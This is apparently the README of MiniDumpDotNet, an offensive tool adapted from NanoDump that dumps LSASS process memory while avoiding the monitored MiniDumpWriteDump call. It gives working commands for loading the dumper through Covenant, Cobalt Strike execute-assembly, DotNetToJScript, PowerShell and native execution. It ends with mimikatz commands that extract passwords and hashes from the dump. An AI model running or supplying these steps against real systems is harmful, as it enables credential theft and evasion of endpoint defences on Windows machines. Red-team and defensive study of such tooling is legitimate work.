.NET injectable LSASS dumper, adapted from NanoDump
The goal of this project is to provide .NET CLR injectable LSASS process dumping capbility that avoids usage of the Win32 API call MiniDumpWriteDump() (and associated Win32 API usage patterns).
- Developed in Visual C++ with CLR support
- Reduced size LSASS dump (similar to NanoDump)
- Compiler intrinsics removed to accommodate Pure CLR compilation
- Pre-configured to support injection via:
- Assembly.Load() (e.g. Cobalt Strike "execute-assembly" and Covenant "Assembly" commands)
- DotNetToJScript/GadgetToJscript COM-based Memory Stream injection
- PowerShell non-GAC Type import
- Binary execution
<insert clone command>
This project was implemented with Visual Studio 2015, but should be supported by any Visual Studio compiler that can build VS C++ CLR code. Building the solution will generate both a binary executable, as well as a .NET class library.
Build -> Build Solution
or
CTRL+SHIFT+B
This project was largely adapated to fill a needed gap within Covenant C2.
Assembly /assemblyname:"\"" /parameters:"620 dump.dmp"
Although you can use this payload with execute-assembly, you may have better luck with BOF-based projects referenced below.
execute-assembly /path/to/binary <PID> <DUMPFILE>
MiniDumpDotNet can be integrated into both DotNetToJScript and GadgetToJscript commands:
Download and build the DotNetToJScript project in Visual Studio. Then use the generator to create the payload minidumpdotnet.js.
DotNetToJScript\DotNetToJScript\bin\Debug\DotNetToJScript.exe -d -v v4 -l JScript -o minidumpdotnet.js -c MiniDump.MiniDump MiniDumpDotNet\minidumpdotnet.dll
Update minidumpdotnet.js to include the PID of the LSASS process: o.DumpPid(620, "dump.dmp");
cscript minidumpdotnet.js
PowerShell can be used to load arbitrary .NET class libraries which can be used to run this tool as well.
[string]$assemblyPath = ".\minidumpdotnet.dll"
Add-Type -Path $assemblyPath
[MiniDump.MiniDump]$a = New-Object -TypeName 'MiniDump.MiniDump'
$a.DumpPid(620, "dump.dmp")
When all else fails, native execution is worth a shot.
minidumpdotnet.exe 620 dump.dmp
Extracting credentials (or hashes) from the dump is performed just as you would normally.
mimikatz.exe
sekurlsa::minidump dump.dmp
sekurlsa::logonPasswords
Many of the opsec-specific features (e.g. SysWhispers, handle duplication, corrupt MiniDump header, etc) from NanoDump were removed to produce the first pass at this project. Some of these features may be reintroduced at a later date. Additionally, the resulting source code for this project was reorganized, and various Windows structures, enums and constants were added to avoid include conflicts.
- The developers at HelpSystems for the NanoDump project
- rooku for the BOFs project, which contains a general purpose reimplementation of MiniDumpWriteDump based on ReactOS
- The developers for ReactOS for providing reference code for the MiniDumpWriteDump API
- All other developers of the amazing offensive security products and tools mentioned above